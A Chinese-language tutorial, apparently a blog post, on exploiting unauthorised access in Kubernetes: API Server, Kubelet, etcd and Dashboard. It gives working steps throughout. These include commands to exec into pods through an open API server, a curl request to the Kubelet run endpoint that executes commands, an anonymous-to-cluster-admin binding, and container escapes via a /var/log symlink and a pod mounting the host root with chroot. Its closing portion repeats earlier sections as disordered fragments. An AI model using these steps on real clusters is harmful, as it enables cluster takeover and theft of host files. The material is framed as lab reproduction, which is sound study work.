Kubernetes未授权访问漏洞及利用详解<\/h1>

一、Kubernetes未授权访问概述<\/h2>

Kubernetes(K8s)作为流行的容器编排系统，存在多种未授权访问风险，主要包括：<\/p>

API Server未授权访问(8080\/6443端口)<\/li>
Kubelet未授权访问(10250端口)<\/li>
etcd未授权访问(2379端口)<\/li>

Dashboard面板泄露<\/li> <\/ol>

二、API Server未授权访问(8080\/6443端口)<\/h2>

1. 漏洞原理<\/h3>

K8s的API Server默认服务端口：<\/p>

8080端口(insecure-port)：提供HTTP服务，默认无认证授权机制<\/li>

6443端口(secure-port)：提供HTTPS服务，支持认证授权<\/li> <\/ul>

默认情况下8080端口关闭，6443端口开启。配置取决于\/etc\/kubernetes\/manifests\/kube-apiserver.yaml<\/code>文件。<\/p>

2. 漏洞复现<\/h3>
8080端口未授权<\/h4>

修改配置文件：<\/li>
<\/ol>
vim \/etc\/kubernetes\/manifests\/kube-apiserver.yaml
<\/span><\/span><\/code><\/pre>
重启K8s：<\/li>
<\/ol>
systemctl restart kubectl
<\/span><\/span><\/code><\/pre>
访问8080端口验证未授权<\/li>
<\/ol>
6443端口未授权<\/h4>
配置错误可能导致6443端口未授权，如将system:anonymous<\/code>用户绑定到cluster-admin<\/code>用户组：<\/p>
kubectl create clusterrolebinding cluster-system-anonymous --clusterrole=<\/span>cluster-admin --user=<\/span>system:anonymous
<\/span><\/span><\/code><\/pre>3. 漏洞利用<\/h3>
使用kubectl命令执行操作：<\/p>
# 查看集群信息<\/span>
<\/span><\/span>kubectl -s http:\/\/<IP>:8080 cluster-info
<\/span><\/span>
<\/span><\/span># 查看节点和Pod信息<\/span>
<\/span><\/span>kubectl -s http:\/\/<IP>:8080 get nodes
<\/span><\/span>kubectl -s http:\/\/<IP>:8080 get pods
<\/span><\/span>
<\/span><\/span># 查看详细信息<\/span>
<\/span><\/span>kubectl -s http:\/\/<IP>:8080 get nodes -o wide
<\/span><\/span>kubectl -s http:\/\/<IP>:8080 get pods -o wide
<\/span><\/span>
<\/span><\/span># 进入Pod执行命令<\/span>
<\/span><\/span>kubectl -s http:\/\/<IP>:8080 exec -n default -it <pod-name> -- \/bin\/bash
<\/span><\/span><\/code><\/pre>4. 容器逃逸技术<\/h3>
通过挂载\/var\/log<\/code>目录逃逸的原理：<\/p>

自定义服务账户：在Pod中通过serviceAccountName<\/code>指定自定义服务账户<\/li>
授予宿主机目录权限：使用ClusterRole和ClusterRoleBinding为服务账户授权<\/li>
挂载宿主机目录：通过hostPath类型的Volume挂载宿主机目录<\/li>
访问宿主机日志文件：通过挂载路径访问宿主机文件<\/li>
容器逃逸：实现从Pod到宿主机的逃逸<\/li>
<\/ol>
关键概念：<\/h4>

RBAC<\/strong>：基于角色的访问控制

Role：定义命名空间内允许的操作<\/li>
RoleBinding：将角色与用户\/组\/服务账户绑定<\/li>
ClusterRole：全局权限定义<\/li>
ClusterRoleBinding：全局角色绑定<\/li>
<\/ul>
<\/li>
服务账户(ServiceAccount)<\/strong>：表示Pod内部应用程序身份<\/li>
卷挂载(Volume Mounting)<\/strong>：将存储卷附加到Pod中<\/li>
<\/ul>
实验环境搭建：<\/h4>
git clone https:\/\/github.com\/Metarget\/metarget.git
<\/span><\/span>cd metarget\/
<\/span><\/span>pip3 install -r requirements.txt
<\/span><\/span>.\/metarget gadget install k8s --version 1.16.5
<\/span><\/span>.\/metarget cnv install mount-var-log
<\/span><\/span><\/code><\/pre>手动创建Pod配置(mount-var-log.yaml)：<\/h4>
apiVersion<\/span>: v1<\/span>
<\/span><\/span>kind<\/span>: ServiceAccount<\/span>
<\/span><\/span>metadata<\/span>:
<\/span><\/span>  name<\/span>: logger<\/span>
<\/span><\/span>
<\/span><\/span>---
<\/span><\/span>apiVersion<\/span>: rbac.authorization.k8s.io\/v1<\/span>
<\/span><\/span>kind<\/span>: ClusterRole<\/span>
<\/span><\/span>metadata<\/span>:
<\/span><\/span>  name<\/span>: user-log-reader<\/span>
<\/span><\/span>rules<\/span>:
<\/span><\/span>- apiGroups<\/span>: [""<\/span>]
<\/span><\/span>  resources<\/span>: ["nodes\/log"<\/span>]
<\/span><\/span>  verbs<\/span>: ["get"<\/span>, "list"<\/span>, "watch"<\/span>]
<\/span><\/span>
<\/span><\/span>---
<\/span><\/span>apiVersion<\/span>: rbac.authorization.k8s.io\/v1<\/span>
<\/span><\/span>kind<\/span>: ClusterRoleBinding<\/span>
<\/span><\/span>metadata<\/span>:
<\/span><\/span>  name<\/span>: user-log-reader<\/span>
<\/span><\/span>roleRef<\/span>:
<\/span><\/span>  apiGroup<\/span>: rbac.authorization.k8s.io<\/span>
<\/span><\/span>  kind<\/span>: ClusterRole<\/span>
<\/span><\/span>  name<\/span>: user-log-reader<\/span>
<\/span><\/span>subjects<\/span>:
<\/span><\/span>- kind<\/span>: ServiceAccount<\/span>
<\/span><\/span>  name<\/span>: logger<\/span>
<\/span><\/span>  namespace<\/span>: default<\/span>
<\/span><\/span>
<\/span><\/span>---
<\/span><\/span>apiVersion<\/span>: v1<\/span>
<\/span><\/span>kind<\/span>: Pod<\/span>
<\/span><\/span>metadata<\/span>:
<\/span><\/span>  name<\/span>: escaper<\/span>
<\/span><\/span>spec<\/span>:
<\/span><\/span>  serviceAccountName<\/span>: logger<\/span>
<\/span><\/span>  containers<\/span>:
<\/span><\/span>  - name<\/span>: escaper<\/span>
<\/span><\/span>    image<\/span>: danielsagi\/kube-pod-escape<\/span>
<\/span><\/span>    volumeMounts<\/span>:
<\/span><\/span>    - name<\/span>: logs<\/span>
<\/span><\/span>      mountPath<\/span>: \/var\/log\/host<\/span>
<\/span><\/span>  volumes<\/span>:
<\/span><\/span>  - name<\/span>: logs<\/span>
<\/span><\/span>    hostPath<\/span>:
<\/span><\/span>      path<\/span>: \/var\/log\/<\/span>
<\/span><\/span>      type<\/span>: Directory<\/span>
<\/span><\/span><\/code><\/pre>漏洞检测：<\/h4>
find \/ -name lastlog 2>\/dev\/null | wc -l | grep -q 3<\/span> &&<\/span> echo "\/var\/log is mounted."<\/span> ||<\/span> echo "\/var\/log is not mounted."<\/span>
<\/span><\/span><\/code><\/pre>漏洞利用：<\/h4>

进入容器：<\/li>
<\/ol>
kubectl get pods
<\/span><\/span>kubectl exec --stdin --tty escaper -- \/bin\/bash
<\/span><\/span><\/code><\/pre>
创建软链接：<\/li>
<\/ol>
cd \/var\/log\/host
<\/span><\/span>ln -s \/ .\/root_link
<\/span><\/span><\/code><\/pre>
使用脚本窃取敏感文件：<\/li>
<\/ol>
chmod 777<\/span> find_sensitive_files.py
<\/span><\/span>python find_sensitive_files.py
<\/span><\/span><\/code><\/pre>5. 判断是否处于K8s环境<\/h3>
# 查看磁盘信息<\/span>
<\/span><\/span>df -h
<\/span><\/span>
<\/span><\/span># 查看环境变量<\/span>
<\/span><\/span>env
<\/span><\/span><\/code><\/pre>三、Kubelet未授权访问(10250端口)<\/h2>
1. 漏洞原理<\/h3>
10250端口是Kubelet的默认端口，负责管理节点上的容器和Pod。默认配置中--anonymous-auth<\/code>为true时允许匿名访问。<\/p>
2. 漏洞利用<\/h3>
通过curl执行命令：<\/p>
curl -XPOST -k "https:\/\/<IP>:10250\/run\/<namespace>\/<pod>\/<container>"<\/span> -d "cmd=<command>"<\/span>
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

namespace：命名空间<\/li>
pod：Pod名称<\/li>
container：容器名称<\/li>
<\/ol>
四、etcd未授权访问(2379端口)<\/h2>
1. 漏洞原理<\/h3>
2379端口用于客户端与etcd通信，默认配置中本地(127.0.0.1)可免认证访问，其他地址需要认证。<\/p>
2. 注意事项<\/h3>
默认配置2379只监听127.0.0.1，实战中较少遇到。<\/p>
五、Dashboard面板泄露<\/h2>
1. 安装Dashboard<\/h3>
wget https:\/\/raw.githubusercontent.com\/kubernetes\/dashboard\/v2.2.0\/aio\/deploy\/recommended.yaml
<\/span><\/span>kubectl apply -f recommended.yaml
<\/span><\/span><\/code><\/pre>2. 创建管理员角色<\/h3>
dashboard-svc-account.yaml:<\/p>
apiVersion<\/span>: v1<\/span>
<\/span><\/span>kind<\/span>: ServiceAccount<\/span>
<\/span><\/span>metadata<\/span>:
<\/span><\/span>  name<\/span>: dashboard-admin<\/span>
<\/span><\/span>  namespace<\/span>: kube-system<\/span>
<\/span><\/span>
<\/span><\/span>---
<\/span><\/span>kind<\/span>: ClusterRoleBinding<\/span>
<\/span><\/span>apiVersion<\/span>: rbac.authorization.k8s.io\/v1<\/span>
<\/span><\/span>metadata<\/span>:
<\/span><\/span>  name<\/span>: dashboard-admin<\/span>
<\/span><\/span>subjects<\/span>:
<\/span><\/span>- kind<\/span>: ServiceAccount<\/span>
<\/span><\/span>  name<\/span>: dashboard-admin<\/span>
<\/span><\/span>  namespace<\/span>: kube-system<\/span>
<\/span><\/span>roleRef<\/span>:
<\/span><\/span>  kind<\/span>: ClusterRole<\/span>
<\/span><\/span>  name<\/span>: cluster-admin<\/span>
<\/span><\/span>  apiGroup<\/span>: rbac.authorization.k8s.io<\/span>
<\/span><\/span><\/code><\/pre>应用配置：<\/p>
kubectl apply -f dashboard-svc-account.yaml
<\/span><\/span><\/code><\/pre>3. 获取token<\/h3>
kubectl get secrets -n kube-system | grep dashboard-admin
<\/span><\/span>kubectl describe secret dashboard-admin-token-xxxxx -n kube-system
<\/span><\/span><\/code><\/pre>4. 通过Dashboard创建Pod挂载宿主机目录<\/h3>
Pod配置示例：<\/p>
apiVersion<\/span>: v1<\/span>
<\/span><\/span>kind<\/span>: Pod<\/span>
<\/span><\/span>metadata<\/span>:
<\/span><\/span>  name<\/span>: myapp<\/span>
<\/span><\/span>spec<\/span>:
<\/span><\/span>  containers<\/span>:
<\/span><\/span>  - image<\/span>: nginx<\/span>
<\/span><\/span>    name<\/span>: container<\/span>
<\/span><\/span>    volumeMounts<\/span>:
<\/span><\/span>    - mountPath<\/span>: \/mnt<\/span>
<\/span><\/span>      name<\/span>: test-volume<\/span>
<\/span><\/span>  volumes<\/span>:
<\/span><\/span>  - name<\/span>: test-volume<\/span>
<\/span><\/span>    hostPath<\/span>:
<\/span><\/span>      path<\/span>: \/<\/span>
<\/span><\/span><\/code><\/pre>逃逸方法：<\/p>
chroot \/mnt
<\/span><\/span><\/code><\/pre>六、常见kubectl命令总结<\/h2>
kubectl get pods # 查询Pod<\/span>
<\/span><\/span>kubectl get pods -n namespace # 查询指定命名空间的Pod<\/span>
<\/span><\/span>kubectl get pods --all-namespaces # 查询所有命名空间的Pod<\/span>
<\/span><\/span>kubectl describe pod pod-name # 查询Pod详细信息<\/span>
<\/span><\/span>kubectl get serviceaccount # 查询服务账户<\/span>
<\/span><\/span>kubectl create serviceaccount account-name # 创建服务账户<\/span>
<\/span><\/span>kubectl config view # 打印kubeconfig配置<\/span>
<\/span><\/span>kubectl get rolebinding -n namespace # 查看RBAC权限设置<\/span>
<\/span><\/span>kubectl describe role role-name -n namespace # 查看角色绑定规则<\/span>
<\/span><\/span>kubectl exec -it pod-name -c container-name -- \/bin\/bash # 进入容器<\/span>
<\/span><\/span>kubectl cp pod-name:container-path local-path # 从容器复制文件<\/span>
<\/span><\/span>kubectl get deployment # 查询Deployment<\/span>
<\/span><\/span>kubectl scale deployment deployment-name --replicas=<\/span>3<\/span> # 扩缩容<\/span>
<\/span><\/span>kubectl rollout restart deployment deployment-name # 重启Deployment<\/span>
<\/span><\/span>kubectl apply -f file.yaml # 应用YAML配置<\/span>
<\/span><\/span><\/code><\/pre>七、总结思维图<\/h2>
（此处应插入总结思维图，展示各漏洞类型、端口、利用方法之间的关系）<\/p>
八、参考链接<\/h2>

K8s API Server未授权命令执行<\/a><\/li>
Kubernetes Dashboard部署<\/a><\/li>
K8S各种未授权攻击方法<\/a><\/li>
Kubernetes安全<\/a><\/li>
K8S学习笔记<\/a><\/li>
k8s serviceAccount授权和认证机制<\/a><\/li>
<\/ol>

Kubernetes未授权访问漏洞及利用详解<\/h1>

二、API Server未授权访问(8080\/6443端口)<\/h2>

三、Kubelet未授权访问(10250端口)<\/h2>

1. 漏洞原理<\/h3> 10250端口是Kubelet的默认端口，负责管理节点上的容器和Pod。默认配置中--anonymous-auth<\/code>为true时允许匿名访问。<\/p>

四、etcd未授权访问(2379端口)<\/h2>

1. 漏洞原理<\/h3> 2379端口用于客户端与etcd通信，默认配置中本地(127.0.0.1)可免认证访问，其他地址需要认证。<\/p>

2. 注意事项<\/h3> 默认配置2379只监听127.0.0.1，实战中较少遇到。<\/p>

五、Dashboard面板泄露<\/h2>

七、总结思维图<\/h2> （此处应插入总结思维图，展示各漏洞类型、端口、利用方法之间的关系）<\/p>

八、参考链接<\/h2> K8s API Server未授权命令执行<\/a><\/li> Kubernetes Dashboard部署<\/a><\/li> K8S各种未授权攻击方法<\/a><\/li> Kubernetes安全<\/a><\/li> K8S学习笔记<\/a><\/li> k8s serviceAccount授权和认证机制<\/a><\/li> <\/ol>

1. 漏洞原理<\/h3>
10250端口是Kubelet的默认端口，负责管理节点上的容器和Pod。默认配置中`--anonymous-auth<\/code>为true时允许匿名访问。<\/p>`

1. 漏洞原理<\/h3>
2379端口用于客户端与etcd通信，默认配置中本地(127.0.0.1)可免认证访问，其他地址需要认证。<\/p>

2. 注意事项<\/h3>
默认配置2379只监听127.0.0.1，实战中较少遇到。<\/p>

七、总结思维图<\/h2>
（此处应插入总结思维图，展示各漏洞类型、端口、利用方法之间的关系）<\/p>

八、参考链接<\/h2>

K8s API Server未授权命令执行<\/a><\/li>
Kubernetes Dashboard部署<\/a><\/li>
K8S各种未授权攻击方法<\/a><\/li>
Kubernetes安全<\/a><\/li>
K8S学习笔记<\/a><\/li>
k8s serviceAccount授权和认证机制<\/a><\/li> <\/ol>